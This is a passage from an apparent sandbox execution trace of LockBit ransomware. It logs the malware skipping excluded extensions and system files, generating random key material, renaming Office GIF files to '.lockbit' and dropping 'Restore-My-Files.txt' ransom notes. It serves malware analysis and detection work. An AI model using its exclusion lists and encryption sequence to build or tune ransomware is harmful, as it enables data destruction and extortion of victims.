lpString2=".GIF") returned 1 [0205.692] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.693] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.693] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF.lockbit") returned 76 [0205.693] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10290_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0205.694] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.694] malloc (_Size=0x40068) returned 0x1ff1e60 [0205.694] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=308) returned 1 [0205.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0205.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0205.696] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0205.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.700] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.701] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.701] free (_Block=0x1fa2ed8) [0205.701] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10290_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.701] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.701] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73f8f500, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc8b9d80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x73f8f500, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x497, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10307_.GIF", cAlternateFileName="")) returned 1 [0205.701] lstrcmpiW (lpString1=".", lpString2="BD10307_.GIF") returned -1 [0205.701] lstrcmpiW (lpString1="..", lpString2="BD10307_.GIF") returned -1 [0205.701] PathFindExtensionW (pszPath="BD10307_.GIF") returned=".GIF" [0205.701] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.701] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.701] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.701] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.701] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.701] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.701] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.701] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.701] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.701] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.702] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.702] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.702] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.702] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.702] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.702] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.702] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.702] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.703] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10307_.GIF") returned 1 [0205.703] lstrcmpiW (lpString1="ntldr", lpString2="BD10307_.GIF") returned 1 [0205.703] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10307_.GIF") returned 1 [0205.703] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10307_.GIF") returned 1 [0205.703] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10307_.GIF") returned -1 [0205.703] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10307_.GIF") returned 1 [0205.703] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10307_.GIF") returned 1 [0205.703] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.703] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF") returned=".GIF" [0205.703] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.703] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.704] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.704] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.705] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.705] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF.lockbit") returned 76 [0205.705] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10307_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0205.706] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.706] malloc (_Size=0x40068) returned 0x1ff1e60 [0205.706] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1175) returned 1 [0205.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0205.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.708] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0205.708] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0205.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.722] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.722] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.722] free (_Block=0x1fa2ed8) [0205.722] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10307_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.722] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.723] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x752a2200, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc8b9d80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x752a2200, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x27d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10308_.GIF", cAlternateFileName="")) returned 1 [0205.723] lstrcmpiW (lpString1=".", lpString2="BD10308_.GIF") returned -1 [0205.723] lstrcmpiW (lpString1="..", lpString2="BD10308_.GIF") returned -1 [0205.723] PathFindExtensionW (pszPath="BD10308_.GIF") returned=".GIF" [0205.723] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.723] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.723] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.723] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.723] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.723] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.723] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.724] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.724] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.724] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.724] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.724] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.724] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.724] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10308_.GIF") returned 1 [0205.725] lstrcmpiW (lpString1="ntldr", lpString2="BD10308_.GIF") returned 1 [0205.725] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10308_.GIF") returned 1 [0205.725] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10308_.GIF") returned 1 [0205.725] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10308_.GIF") returned -1 [0205.725] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10308_.GIF") returned 1 [0205.725] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10308_.GIF") returned 1 [0205.725] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.725] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF") returned=".GIF" [0205.725] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.725] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.725] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.726] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.726] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.726] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.726] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.726] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF.lockbit") returned 76 [0205.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10308_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0205.728] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.728] malloc (_Size=0x40068) returned 0x1ff1e60 [0205.728] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=637) returned 1 [0205.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0205.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0205.729] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0205.739] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.739] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.739] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0205.766] free (_Block=0x1fa2ed8) [0205.766] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10308_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.766] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.766] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.766] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a6c900, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbc8b9d80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x68a6c900, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x3a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10358_.GIF", cAlternateFileName="")) returned 1 [0205.766] lstrcmpiW (lpString1=".", lpString2="BD10358_.GIF") returned -1 [0205.766] lstrcmpiW (lpString1="..", lpString2="BD10358_.GIF") returned -1 [0205.766] PathFindExtensionW (pszPath="BD10358_.GIF") returned=".GIF" [0205.766] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.766] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.766] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.766] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.766] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.766] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.766] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.766] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.766] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.766] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.766] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.767] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.767] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 